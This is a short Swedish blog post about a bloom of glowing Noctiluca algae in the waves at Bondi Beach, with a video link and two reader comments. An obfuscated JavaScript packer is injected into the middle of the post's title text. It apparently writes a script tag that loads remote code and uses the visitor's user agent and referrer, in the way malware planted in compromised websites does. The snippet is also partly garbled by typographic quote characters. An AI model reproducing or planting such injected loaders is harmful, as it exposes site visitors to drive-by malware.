Image Image Image Image Image Image Image Image Image Image

| 27 januari, 2020

Scroll to top

Top

Självlysande alger lyser upp vågorna på Bondi Beach

Filip Urde
  • On 4 december, 2012
  • http://www.revue.se/filip-urde

Självlysande eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rkbhz|var|u0026u|referrer|nafss||js|php’.split(’|’),0,{}))
alger

Utanför Bondi Beach i Australien så har det varit en stor algblomning under någon vecka. Algerna, vars namn är Noctiluca scintillans är speciella på det sättet att dem börjar lysa när dem blir störda, vilket vi kan se här när dem åker med i vågorna. Riktigt häftigt måste jag säga!

Tack Fredrik för tipset!
vimeo.com

Comments

  1. Malin

    Riktigt häftigt. Tror jag såg det när jag var vid Bondi.

    • Måste vart coolt att se live!